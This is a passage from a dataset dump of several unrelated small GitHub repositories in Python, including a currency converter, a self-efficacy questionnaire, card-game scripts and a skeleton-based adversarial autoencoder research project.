myserial.write(ord(key).to_bytes(1,\"big\"))\n for c in range(16):\n posx = ((0x1F & int.from_bytes(myserial.read(),\"big\") | (int.from_bytes(myserial.read(),\"big\") & 0xF) << 5))\n posy = ((0x1F & int.from_bytes(myserial.read(),\"big\") | (int.from_bytes(myserial.read(),\"big\") & 0xF) << 5))\n mypixelValue = int.from_bytes(myserial.read(),\"big\")\n print(\"pixel x = \",posx,\"pixel y = \",posy,\"pixel value =\",mypixelValue)\n state = 0\n else:\n print(\"Command is not correct re-Enter for Active\")\n\n except serial.SerialException:\n print(\"Port busy\", file=sys.__stderr__)\n"
}
] | 3 |
lnandi1/Test_repository
|
https://github.com/lnandi1/Test_repository
|
3f1d6e1e779ddbf4c61ed41e563d59e8059964a0
|
b471aeafa7cf6e7a642f6d58ec91ec7b94bcde6c
|
ab48bebc63419f108cd360b6f0ab5a446148c51b
|
refs/heads/master
| 2020-03-29T10:16:58.933385 | 2019-07-22T13:57:10 | 2019-07-22T13:57:10 | 149,797,351 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5377643704414368,
"alphanum_fraction": 0.5579053163528442,
"avg_line_length": 22.04878044128418,
"blob_id": "73acb052e2002bb3fe86da5bb39793b1a15513f4",
"content_id": "3d46e506e66a1070e692817abe587a70fc195b2d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 993,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 41,
"path": "/Answers_to_Functions.py",
"repo_name": "lnandi1/Test_repository",
"src_encoding": "UTF-8",
"text": "'''\r\nConverting currenices\r\nMiles and Kilometers\r\nKilograms and Pounds\r\nCelsius and Fahrenheit\r\n\r\n'''\r\ndef print_menu():\r\n print('1. British Pounds to US Dollars')\r\n print('2. British Pounds to Euros')\r\n print('3. British Pounds to Yens')\r\n \r\ndef Pounds_Dollars():\r\n Pounds = float(input('Enter Pounds: '))\r\n Dollars = Pounds * 1.28\r\n print('Amount in Dollars is: ',round(Dollars,2))\r\n\r\ndef Pounds_Euros():\r\n Pounds = float(input('Enter Pounds: '))\r\n Euros = Pounds * 1.19\r\n print('Amount in Euros is: ',round(Euros,2))\r\n\r\ndef Pounds_Yens():\r\n Pounds = float(input('Enter Pounds: '))\r\n Yen = Pounds * 139.79\r\n print('Amount in Yens is:',round(Yen,2)) \r\n \r\n\r\n\r\ndef main():\r\n print_menu()\r\n choice = input('Which conversion would you like to do? ')\r\n\r\n if choice == '1':\r\n Pounds_Dollars()\r\n if choice == '2':\r\n Pounds_Euros()\r\n if choice == '3':\r\n Pounds_Yens()\r\n\r\nmain()\r\n\r\n \r\n"
},
{
"alpha_fraction": 0.5079872012138367,
"alphanum_fraction": 0.5447284579277039,
"avg_line_length": 17.4375,
"blob_id": "8ab0bb38c56de80fb5890e46b1113d5d5eb67a04",
"content_id": "590c24bf6e11ab34beed944d1176c05929bb55ed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 626,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 32,
"path": "/Return_routine.py",
"repo_name": "lnandi1/Test_repository",
"src_encoding": "UTF-8",
"text": "'''\r\ndef Addition(apples,bananas):\r\n total = apples + bananas\r\n print(total)\r\n\r\nAddition(100, 200)\r\nAddition(200,400)\r\n\r\n\r\ndef Addition_more(apples,bananas):\r\n total = apples + bananas\r\n return total\r\n\r\n\r\nSum = Addition_more(99, 888)\r\nprint(Sum)\r\n\r\n\r\ndef Multiplication(apples,bananas):\r\n total = apples * bananas\r\n return total\r\n\r\nProduct = Multiplication(12,5)\r\nprint(Product)\r\n'''\r\n\r\ndef Subtraction(apples,bananas):\r\n total = apples - bananas\r\n return total\r\n\r\nSum = Subtraction(6,21)\r\nprint(Sum)\r\n\r\n\r\n"
}
] | 2 |
Zainabalabi/mini-project-on-self-efficacy-instrument
|
https://github.com/Zainabalabi/mini-project-on-self-efficacy-instrument
|
4cef94a40948bb45d834984818f7f77bdfc080b7
|
856be90c4dad0bbcd9bff78b99422ba2de2286de
|
fec9b5151c47167acb9db3ca80dcaeb7a8bf7fc6
|
refs/heads/master
| 2020-04-11T02:56:58.446025 | 2018-12-12T09:21:11 | 2018-12-12T09:21:11 | 161,461,292 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5932499766349792,
"alphanum_fraction": 0.6222500205039978,
"avg_line_length": 28.78294563293457,
"blob_id": "61ac0fbf0cb4bd2ae487704440946c4fb6952d6e",
"content_id": "c6d21b36666917b23a676bed23e5e3497da0fe56",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4000,
"license_type": "no_license",
"max_line_length": 207,
"num_lines": 129,
"path": "/Self-efficacy test.py",
"repo_name": "Zainabalabi/mini-project-on-self-efficacy-instrument",
"src_encoding": "UTF-8",
"text": "name =(input(\"Enter your name here:\"))\r\n\r\nprint(\"Welcome\", name,\"! you are about to take a General Self-efficacy test.\")\r\n\r\nprint(\"Input the option that best describes your answer. \\na = Not at all true \\nb = Hardly true \\nc = Moderately true \\nd = Exactly true\")\r\n\r\nprint(\"Please note that there is no right or wrong answer, all options are valid.\")\r\n\r\n\r\n\r\na = 1\r\nb = 2\r\nc = 3\r\nd = 4\r\n\r\nscore = 0\r\n\r\n\r\nquestion1= input(\"I can always manage to solve difficult problems if I try hard enough. \\n\")\r\nif(question1 ==\"a\"):\r\n score = score + 1\r\nelif(question1 ==\"b\"):\r\n score = score + 2\r\nelif(question1 ==\"c\"):\r\n score = score + 3\r\nelif(question1 ==\"d\"):\r\n score = score + 4\r\n\r\nquestion2= input(\"If someone opposes me, I can find the means and ways to get what I want. \\n\")\r\nif(question2 ==\"a\"):\r\n score = score + 1\r\nelif(question2 ==\"b\"):\r\n score = score + 2\r\nelif(question2 ==\"c\"):\r\n score = score + 3\r\nelif(question2 ==\"d\"):\r\n score = score + 4\r\n\r\nquestion3= input(\"It is easy for me to stick to my aims and accomplish my goals. \\n\")\r\nif(question3 ==\"a\"):\r\n score = score + 1\r\nelif(question3 ==\"b\"):\r\n score = score + 2\r\nelif(question3 ==\"c\"):\r\n score = score + 3\r\nelif(question3 ==\"d\"):\r\n score = score + 4\r\n\r\nquestion4= input(\"I am confident that I could deal efficiently with unexpected events. \\n\")\r\nif(question4 ==\"a\"):\r\n score = score + 1\r\nelif(question4 ==\"b\"):\r\n score = score + 2\r\nelif(question4 ==\"c\"):\r\n score = score + 3\r\nelif(question4 ==\"d\"):\r\n score = score + 4\r\n\r\nquestion5= input(\"Thanks to my resourcefulness, I know how to handle unforeseen situations. \\n\")\r\nif(question5 ==\"a\"):\r\n score = score + 1\r\nelif(question5 ==\"b\"):\r\n score = score + 2\r\nelif(question5 ==\"c\"):\r\n score = score + 3\r\nelif(question5 ==\"d\"):\r\n score = score + 4\r\n\r\nquestion6= input(\"I can solve most problems if I invest the necessary effort. \\n\")\r\nif(question6 ==\"a\"):\r\n score = score + 1\r\nelif(question6 ==\"b\"):\r\n score = score + 2\r\nelif(question6 ==\"c\"):\r\n score = score + 3\r\nelif(question6 ==\"d\"):\r\n score = score + 4\r\n\r\nquestion7= input(\"I can remain calm when facing difficulties because I can rely on my coping abilities. \\n\")\r\nif(question7 ==\"a\"):\r\n score = score + 1\r\nelif(question7 ==\"b\"):\r\n score = score + 2\r\nelif(question7 ==\"c\"):\r\n score = score + 3\r\nelif(question7 ==\"d\"):\r\n score = score + 4\r\n\r\nquestion8= input(\"When I am confronted with a problem, I can usually find several solutions. \\n\")\r\nif(question8 ==\"a\"):\r\n score = score + 1\r\nelif(question8 ==\"b\"):\r\n score = score + 2\r\nelif(question8 ==\"c\"):\r\n score = score + 3\r\nelif(question8 ==\"d\"):\r\n score = score + 4\r\n\r\nquestion9= input(\"If I am in trouble, I can usually think of a solution. \\n\")\r\nif(question9 ==\"a\"):\r\n score = score + 1\r\nelif(question9 ==\"b\"):\r\n score = score + 2\r\nelif(question9 ==\"c\"):\r\n score = score + 3\r\nelif(question9 ==\"d\"):\r\n score = score + 4\r\n\r\nquestion10= input(\"I can usually handle whatever comes my way. \\n\")\r\nif(question10 ==\"a\"):\r\n score = score + 1\r\nelif(question10 ==\"b\"):\r\n score = score + 2\r\nelif(question10 ==\"c\"):\r\n score = score + 3\r\nelif(question10 ==\"d\"):\r\n score = score + 4\r\n\r\n \r\nprint(\"You got \", score,\".\")\r\n\r\nif score>=10 and score<=20:\r\n print(\"Dear\",name,\", the test result indicates that you have a low percieved self-efficacy. However, this can be enhanced by working on self perception and motivation and social influences arounnd you.\")\r\nelif score>=21 and score<=27:\r\n print(\"Dear\",name,\", the test results indacates that you have a fair percieved self-efficacy, which can be enhanced by consciously working on social influence and self motivation.\")\r\nelif score>=28 and score<=34:\r\n print(\"Dear\",name,\", the test result indicates that you have a good percieved self-efficacy, Weldone! \")\r\nelif score>=35 and score<=40:\r\n print(\"Dear\",name,\", the test result indicates that you have a high perceived self-efficacy, Great!\")\r\n \r\n \r\n"
},
{
"alpha_fraction": 0.8333333134651184,
"alphanum_fraction": 0.8333333134651184,
"avg_line_length": 42,
"blob_id": "49de0b3f09f0ea8c1c45cf60323774c7a798a84b",
"content_id": "3b6571595ec38af738cc6b41ce05f8c51adf0079",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 42,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 1,
"path": "/README.md",
"repo_name": "Zainabalabi/mini-project-on-self-efficacy-instrument",
"src_encoding": "UTF-8",
"text": "# mini-project-on-self-efficacy-instrument"
}
] | 2 |
winnersguard/mtgpy
|
https://github.com/winnersguard/mtgpy
|
cd9b95a88ce3d474f1cb74979a7d5a0923ceb34a
|
4164d434de18f9342c3773c05a923d2dc784e34d
|
45950d64b663611f0f8639cfa96d87b73f9b0819
|
refs/heads/master
| 2019-07-22T17:55:04.328555 | 2016-04-02T08:44:21 | 2016-04-02T08:44:21 | 55,630,510 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5877193212509155,
"alphanum_fraction": 0.5877193212509155,
"avg_line_length": 35,
"blob_id": "ee5a78ee18b239508c32b94c90ef829e8d18f8b8",
"content_id": "70ab36d65433ead32929a6c43b865cf232b6577b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 114,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 3,
"path": "/readInthenOut.py",
"repo_name": "winnersguard/mtgpy",
"src_encoding": "UTF-8",
"text": "\n\nwith open('inputfile.txt', 'r') as infile:\n\twith open('outfile.txt', 'w') as f:\n \t\tf.write(infile.read())\n \n"
},
{
"alpha_fraction": 0.5031446814537048,
"alphanum_fraction": 0.5110062956809998,
"avg_line_length": 23.461538314819336,
"blob_id": "f312af630ce8c210572ca471bff07190b7ecacb3",
"content_id": "14ab581609971e78c6f7c16ef91d1fff1afc7e03",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 636,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 26,
"path": "/splitter.py",
"repo_name": "winnersguard/mtgpy",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python2\n# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4\nimport sys\n\ndef main( args ):\n with open(args[1], 'r') as infile:\n for line in infile:\n num, let = splitter(line)\n print \"numbers: \", num\n print \"letters: \", let\ndef splitter( s ):\n arr = s.split(',')\n nums = []\n letters = []\n for i in arr:\n txt = i.strip()\n if txt.isdigit():\n nums.append(txt)\n elif txt.isalpha():\n letters.append(txt)\n else:\n print txt, \" is neither\"\n return(nums, letters)\n\nif __name__ == \"__main__\":\n main(sys.argv)\n"
},
{
"alpha_fraction": 0.5299999713897705,
"alphanum_fraction": 0.5364285707473755,
"avg_line_length": 23.561403274536133,
"blob_id": "f47820cb44b121856bc2096d9cef34778b847efb",
"content_id": "3fdad44c67390dd353dc6b49f040ccae8f03d06b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1400,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 57,
"path": "/Card.py",
"repo_name": "winnersguard/mtgpy",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python2\n# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4\nimport sys\n\n\nclass Card:\n manatypes = ['C', 'W', 'G', 'U', 'B', 'R', 'WG', 'WU', 'WB',\n 'WR', 'GU', 'GB', 'GR', 'BU', 'BR', 'UR']\n\n def __init__(self, attack, health, cost):\n self.attack, self.health = health, attack\n if self.isValidCost(cost):\n self.cost = cost\n else:\n None\n\n def getAttack(self):\n return self.attack\n\n def getHealth(self):\n return self.health\n\n def getCost(self):\n return self.cost\n\n def setAttack(attack):\n self.attack = attack\n\n def setHealth(health):\n self.health = health\n\n def setCost(cost):\n self.cost = cost\n\n def isValidCost(self, cost):\n return all(True for i in cost.keys() if i in self.manatypes)\n\n def printCost(self):\n return ''.join(\n [a * b if a != 'C' else str(b)\n for (a, b) in self.cost.items()])\n\n def printCard(self):\n print self.getAttack(), \"/\", self.getHealth(), \"for\",\n self.printCost(), \"mana\"\n\n\ndef main(args):\n testData = {'Attack': 2, 'Health': 3, 'Cost': {'U': 2, 'C': 2}}\n with open(args[1]) as infile:\n infile.read()\n testCard = Card(testData['Attack'], testData['Health'], testData['Cost'])\n testCard.printCard()\n\n\nif __name__ == '__main__':\n main(sys.argv)\n"
},
{
"alpha_fraction": 0.61583012342453,
"alphanum_fraction": 0.6254826188087463,
"avg_line_length": 29.47058868408203,
"blob_id": "13d59c349742494d6265b68535446fcc3f39e1b7",
"content_id": "2a2b505ab3d8e1fca4b8212af07e7f72aa185e5a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 518,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 17,
"path": "/dictionary.py",
"repo_name": "winnersguard/mtgpy",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python2\n# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4\nimport sys\n\ndef main( args ):\n with open(args[1], 'r') as infile:\n print gimmeKeys(infile.read())\ndef gimmeKeys( lists ):\n digList = [ d.strip() for d in lists if d.isdigit() ]\n letList = [ c.strip() for c in lists if c.isalpha() ]\n digCat = ''.join(digList)\n letCat = ''.join(letList)\n return({'Digit':digCat, 'Letter':letCat, 'DigitList':digList, 'LetterList':letList})\n\n\nif __name__ == '__main__':\n main(sys.argv)\n"
}
] | 4 |
lqjlqj1997/ST-AAE
|
https://github.com/lqjlqj1997/ST-AAE
|
afff414cf9b435f6fad6d84dc84a9b0a4c89fd8e
|
e1fc3b26f49469963cca84dafe9d35bf76d5e96c
|
65cb5bdade16772667e36b6380ec806411f8a686
|
refs/heads/master
| 2022-07-10T00:56:52.852070 | 2020-05-05T13:09:44 | 2020-05-05T13:09:44 | 255,847,798 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5354499816894531,
"alphanum_fraction": 0.5407058000564575,
"avg_line_length": 39.7117919921875,
"blob_id": "2912eb7c11468225eb6b2558c47f6784a4d0b801",
"content_id": "92c0ec9236201ab8e3886c5ce58c964bfd595c56",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9323,
"license_type": "permissive",
"max_line_length": 157,
"num_lines": 229,
"path": "/processor/processor.py",
"repo_name": "lqjlqj1997/ST-AAE",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# pylint: disable=W0201\nimport sys\n\nimport argparse\nimport yaml\nimport numpy as np\nimport datetime\nimport random\n\n# torch\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\n\n# torchlight\nimport torchlight\nfrom torchlight import str2bool\nfrom torchlight import DictAction\nfrom torchlight import import_class\nimport os\nprint(os.getcwd())\nfrom .base import IO\n\nclass Processor(IO):\n \"\"\"\n Base ProcessorF\n \"\"\"\n\n def __init__(self, argv=None):\n\n self.load_arg(argv)\n self.init_environment()\n self.init_seed()\n self.load_model()\n self.load_weights()\n self.gpu()\n self.load_data()\n self.load_optimizer()\n\n def init_environment(self):\n\n super().init_environment()\n self.result = dict()\n self.iter_info = dict()\n self.epoch_info = dict()\n self.meta_info = dict(epoch=0, iter=0)\n self.seed = self.arg.seed\n\n def init_seed(self):\n if(self.seed is not None):\n torch.cuda.manual_seed_all(self.seed)\n torch.manual_seed(self.seed)\n np.random.seed(self.seed)\n random.seed(self.seed)\n\n def load_optimizer(self):\n pass\n\n def load_data(self):\n Feeder = import_class(self.arg.feeder)\n \n if 'debug' not in self.arg.train_feeder_args:\n self.arg.train_feeder_args['debug'] = self.arg.debug\n \n self.data_loader = dict()\n \n if self.arg.phase == 'train':\n self.data_loader['train'] = torch.utils.data.DataLoader(\n dataset = Feeder(**self.arg.train_feeder_args),\n batch_size = self.arg.batch_size,\n shuffle = True,\n num_workers = self.arg.num_worker * torchlight.ngpu(self.arg.device),\n drop_last = True\n )\n\n if self.arg.test_feeder_args:\n self.data_loader['test'] = torch.utils.data.DataLoader(\n dataset = Feeder(**self.arg.test_feeder_args),\n batch_size = self.arg.test_batch_size,\n shuffle = False,\n num_workers = self.arg.num_worker * torchlight.ngpu(self.arg.device)\n )\n\n def show_epoch_info(self):\n \n for k, v in self.epoch_info.items():\n self.io.print_log('\\t{}: {}'.format(k, v))\n \n if(self.arg.pavi_log):\n self.io.log('train', self.meta_info['iter'], self.epoch_info)\n\n def show_iter_info(self):\n\n if(self.meta_info['iter'] % self.arg.log_interval == 0):\n info ='\\tIter {} Done.'.format(self.meta_info['iter'])\n \n for k, v in self.iter_info.items():\n \n if( isinstance(v, float)):\n info = info + ' | {}: {:.4f}'.format(k, v)\n \n else:\n info = info + ' | {}: {}'.format(k, v)\n\n self.io.print_log(info)\n\n if self.arg.pavi_log:\n self.io.log('train', self.meta_info['iter'], self.iter_info)\n\n def train(self):\n\n for _ in range(100):\n self.iter_info['loss'] = 0\n self.show_iter_info()\n self.meta_info['iter'] += 1\n \n self.epoch_info['mean loss'] = 0\n self.show_epoch_info()\n\n def test(self):\n \n for _ in range(100):\n self.iter_info['loss'] = 1\n self.show_iter_info()\n \n self.epoch_info['mean loss'] = 1\n self.show_epoch_info()\n\n def start(self):\n self.io.print_log('Parameters:\\n{}\\n'.format(str(vars(self.arg))))\n\n # training phase\n if(self.arg.phase == 'train'):\n \n for epoch in range(self.arg.start_epoch, self.arg.num_epoch):\n self.meta_info['epoch'] = epoch\n\n # training\n self.io.print_log('Training epoch: {}'.format(epoch))\n self.train()\n self.io.print_log('Done.')\n\n # save model\n if ((epoch + 1) % self.arg.save_interval == 0) or (\n epoch + 1 == self.arg.num_epoch):\n date_time = datetime.datetime.now().strftime(\"%Y_%m_%d/\")\n filename = date_time + 'epoch{}_model.pt'.format(epoch + 1)\n \n if(not os.path.exists(self.io.work_dir + \"/\" + date_time)):\n os.makedirs(self.io.work_dir + \"/\" + date_time)\n \n self.io.save_model(self.model, filename)\n\n # evaluation\n if ((epoch + 1) % self.arg.eval_interval == 0) or (\n epoch + 1 == self.arg.num_epoch):\n self.io.print_log('Eval epoch: {}'.format(epoch))\n self.test()\n self.io.print_log('Done.')\n # test phase\n elif(self.arg.phase == 'test'):\n\n # the path of weights must be appointed\n if self.arg.weights is None:\n raise ValueError('Please appoint --weights.')\n \n self.io.print_log('Model: {}.'.format(self.arg.model))\n self.io.print_log('Weights: {}.'.format(self.arg.weights))\n\n # evaluation\n self.io.print_log('Evaluation Start:')\n self.test()\n self.io.print_log('Done.\\n')\n\n # save the output of model\n if(self.arg.save_result):\n result_dict = dict(\n zip(self.data_loader['test'].dataset.sample_name,\n self.result))\n \n self.io.save_pkl(result_dict, 'test_result.pkl')\n\n @staticmethod\n def get_parser(add_help=False):\n\n #region arguments yapf: disable\n # parameter priority: command line > config > default\n parser = argparse.ArgumentParser( add_help=add_help, description='Base Processor')\n\n parser.add_argument('-w', '--work_dir', default= './work_dir/tmp', help= 'the work folder for storing results')\n parser.add_argument('-c', '--config' , default= None , help= 'path to the configuration file')\n\n # processor\n parser.add_argument('--phase' , default= 'train', help= 'must be train or test')\n parser.add_argument('--save_result', type= str2bool, default= True , help= 'if ture, the output of the model will be stored')\n parser.add_argument('--start_epoch', type= int , default= 0 , help= 'start training from which epoch')\n parser.add_argument('--num_epoch' , type= int , default= 80 , help= 'stop training in which epoch')\n parser.add_argument('--use_gpu' , type= str2bool, default= True , help= 'use GPUs or not')\n parser.add_argument('--device' , type= int , default= 0, nargs='+', help= 'the indexes of GPUs for training or testing')\n\n # visulize and debug\n parser.add_argument('--seed' , type= int , default= None , help= 'the seed for random generator')\n parser.add_argument('--log_interval' , type= int , default= 100 , help= 'the interval for printing messages (#iteration)')\n parser.add_argument('--save_interval', type= int , default= 10 , help= 'the interval for storing models (#iteration)')\n parser.add_argument('--eval_interval', type= int , default= 5 , help= 'the interval for evaluating models (#iteration)')\n parser.add_argument('--save_log' , type= str2bool, default= True , help= 'save logging or not')\n parser.add_argument('--print_log' , type= str2bool, default= True , help= 'print logging or not')\n parser.add_argument('--pavi_log' , type= str2bool, default= False, help= 'logging on pavi or not')\n\n # feeder\n parser.add_argument('--feeder' , default= 'feeder.feeder', help='data loader will be used')\n parser.add_argument('--num_worker' , type= int, default= 4 , help='the number of worker per gpu for data loader')\n parser.add_argument('--train_feeder_args', action= DictAction, default= dict(), help='the arguments of data loader for training')\n parser.add_argument('--test_feeder_args' , action= DictAction, default= dict(), help='the arguments of data loader for test')\n parser.add_argument('--batch_size' , type= int, default= 256 , help='training batch size')\n parser.add_argument('--test_batch_size' , type= int, default= 256 , help='test batch size')\n \n parser.add_argument('--debug', action= \"store_true\" , help= 'less data, faster loading')\n\n # model\n parser.add_argument('--model' , default= None , help= 'the model will be used')\n parser.add_argument('--model_args', action= DictAction, default= dict(), help= 'the arguments of model')\n parser.add_argument('--weights' , default= None , help= 'the weights for network initialization')\n \n parser.add_argument('--ignore_weights', type= str , default= [], nargs= '+', help= 'the name of weights which will be ignored in the initialization')\n #endregion yapf: enable\n\n return parser\n"
},
{
"alpha_fraction": 0.7352941036224365,
"alphanum_fraction": 0.8039215803146362,
"avg_line_length": 9.300000190734863,
"blob_id": "0a17b82a0546ba5ebbf807d91d3dbb085a9175db",
"content_id": "b8efb3a90ad9f54b72ca2ba4b14c4a0398d3a448",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 102,
"license_type": "permissive",
"max_line_length": 18,
"num_lines": 10,
"path": "/requirements.txt",
"repo_name": "lqjlqj1997/ST-AAE",
"src_encoding": "UTF-8",
"text": "pyyaml\nargparse\nnumpy\nh5py\nopencv-python\nimageio\nscikit-video\ntorch==1.4.0 \ntorchvision==0.5.0\nsklearn"
},
{
"alpha_fraction": 0.4304908215999603,
"alphanum_fraction": 0.4729914963245392,
"avg_line_length": 30.98245620727539,
"blob_id": "ad2b40f886d30566939a0d7fb0317f0884fb439c",
"content_id": "22ba150dc74da4834c7a033da4dfca10831b5e24",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3647,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 114,
"path": "/display_data.py",
"repo_name": "lqjlqj1997/ST-AAE",
"src_encoding": "UTF-8",
"text": "import sys\nimport os\nimport numpy as np\nimport argparse\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\ndef str2bool(v):\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise argparse.ArgumentTypeError('Boolean value expected.')\n\ndef display_skeleton(data,sample_name,save=False):\n \n data = data.reshape((1,) + data.shape)\n\n N, C, T, V, M = data.shape\n\n plt.ion()\n fig = plt.figure()\n mng = plt.get_current_fig_manager()\n \n ax = fig.add_subplot(111, projection='3d')\n \n p_type = ['b-', 'g-', 'r-', 'c-', ' m-', 'y-', 'k-', 'k-', 'k-', 'k-']\n edge = [(1, 2) ,(2, 21) ,(3, 21) ,(4, 3) ,(5, 21) ,(6, 5) , \n (7, 6) ,(8, 7) ,(9, 21) ,(10, 9) ,(11, 10) ,(12, 11) ,\n (13, 1) ,(14, 13) ,(15, 14) ,(16, 15) ,(17, 1) ,(18, 17) ,\n (19, 18),(20, 19) ,(22, 23) ,(23, 8) ,(24, 25) ,(25, 12) ]\n \n edge = [(i-1,j-1) for (i,j) in edge]\n pose = []\n\n for m in range(M):\n a = []\n for i in range(len(edge)):\n a.append(ax.plot(np.zeros(3), np.zeros(3), p_type[m])[0])\n \n pose.append(a)\n\n \n\n ax.axis([-1, 1, -1, 1])\n ax.set_zlim3d(-1, 1)\n ax.view_init(elev=15, azim=45)\n\n if (save is True):\n if not os.path.exists('./image/'+str(sample_name)+\"/\"):\n os.makedirs('./image/'+str(sample_name)+\"/\")\n \n for t in range(T):\n for m in range(M):\n\n for i, (v1, v2) in enumerate(edge):\n x1 = data[0, :2, t, v1, m]#.around(decimals=2)\n x2 = data[0, :2, t, v2, m]\n # print(data[0, 0, t, [v1, v2], m])\n # print(data[0, 1, t, [v1, v2], m])\n \n if (x1.sum() != 0 and x2.sum() != 0) or v1 == 1 or v2 == 1 :\n pose[m][i].set_xdata(data[0, 0, t, [v1, v2], m])\n pose[m][i].set_ydata(data[0, 1, t, [v1, v2], m])\n pose[m][i].set_3d_properties([data[0, 2, t, v1, m],data[0, 2, t, v2, m]]) \n \n \n fig.suptitle('T = {}'.format(t), fontsize=16) \n fig.canvas.draw()\n \n \n if (save is True):\n plt.savefig('./image/'+str(sample_name)+\"/\" + str(t) + '.png')\n\n plt.pause(1/240)\n plt.close(fig)\n\nif __name__ == \"__main__\":\n \n parser = argparse.ArgumentParser( add_help=True, description='Display Skeleton')\n\n parser.add_argument('--data' ,default= \"\" , help='path with the orignal data')\n parser.add_argument('--recon',default= \"\" , help='path of reconstructed data')\n parser.add_argument('--save' ,type= str2bool ,default= False , help='save Figure of skeleton')\n \n arg = parser.parse_args()\n \n data_disp = False\n recon_disp = False\n \n if(os.path.exists(arg.data)) :\n data = np.load(arg.data)\n data_disp = True\n else:\n print(\"Invalid or No Path of data is provided\")\n\n if(os.path.exists(arg.recon)) :\n recon_data = np.load(arg.recon)\n recon_disp = True\n else:\n print(\"Invalid or No Path of reconstructed data is provided\")\n \n\n if(data_disp or recon_disp):\n for i in range(32):\n print(\"====== data {} =======\".format(i))\n \n if(data_disp):\n display_skeleton(data[i] ,\"original_{}\".format(i), save= arg.save)\n \n if(recon_disp):\n display_skeleton(recon_data[i],\"recon_{}\".format(i), save= arg.save)\n\n"
},
{
"alpha_fraction": 0.48991936445236206,
"alphanum_fraction": 0.5161290168762207,
"avg_line_length": 25.157894134521484,
"blob_id": "31467efb23aa3810b277ef12b1e725cd8e0308ec",
"content_id": "e9e68cac9ab695d15f7aa75f0f6031518bb34709",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 496,
"license_type": "permissive",
"max_line_length": 45,
"num_lines": 19,
"path": "/net/subnet/discriminator.py",
"repo_name": "lqjlqj1997/ST-AAE",
"src_encoding": "UTF-8",
"text": "from torch import nn\n\nclass Discriminator(nn.Module):\n\n def __init__(self, latent_dim):\n super(Discriminator, self).__init__()\n\n self.model = nn.Sequential(\n nn.Linear (latent_dim, 64),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear (64 , 32),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear (32 , 1),\n nn.Sigmoid (),\n )\n\n def forward(self, z):\n validity = self.model(z)\n return validity"
},
{
"alpha_fraction": 0.4932543635368347,
"alphanum_fraction": 0.5098168253898621,
"avg_line_length": 29.28903579711914,
"blob_id": "2ac8561d163586fe0550e34d878b787b6c905872",
"content_id": "e46f588d83eb4dc56804801d774d00f08619f77d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9117,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 301,
"path": "/net/ST_AAE.py",
"repo_name": "lqjlqj1997/ST-AAE",
"src_encoding": "UTF-8",
"text": "import sys\nsys.path.extend(['../'])\n\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom net.utils.graph import Graph\nfrom net.subnet.st_gcn import *\nfrom net.subnet.discriminator import Discriminator\n\n\nclass ST_AAE(nn.Module):\n\n def __init__(self, in_channels, T, V, num_class, graph_args,\n edge_importance_weighting=False, **kwargs):\n\n super().__init__()\n temporal_kernel_size= [299,299]\n \n self.T = T\n self.V = V\n self.num_class = num_class\n\n self.encoder = Encoder( in_channels, num_class, \n graph_args , edge_importance_weighting,\n temporal_kernel_size[0]\n )\n self.decoder = Decoder( in_channels, num_class, self.T, self.V, \n graph_args , edge_importance_weighting,\n temporal_kernel_size[1]\n )\n \n self.y_discriminator = Discriminator(num_class)\n self.z_discriminator = Discriminator(num_class)\n\n def forward(self, x ):\n\n N,C,T,V,M = x.size()\n \n # encoder\n cat_y, latent_z = self.encoder(x)\n\n # Catogerise \n cat_y = F.softmax( cat_y , dim=1 )\n\n # Reparameter\n z = self.reparameter(cat_y.view(N,-1,1).repeat(1,1,M).permute(0,2,1).contiguous().view(N*M,-1), latent_z)\n z = z.view(N, M, -1)\n \n\n recon_x = self.decoder(z)\n\n return recon_x, cat_y, latent_z, z\n \n \n def reparameter(self, mean, logvar):\n\n std = torch.exp(0.5 * logvar) \n eps = torch.randn_like(logvar)\n\n return mean 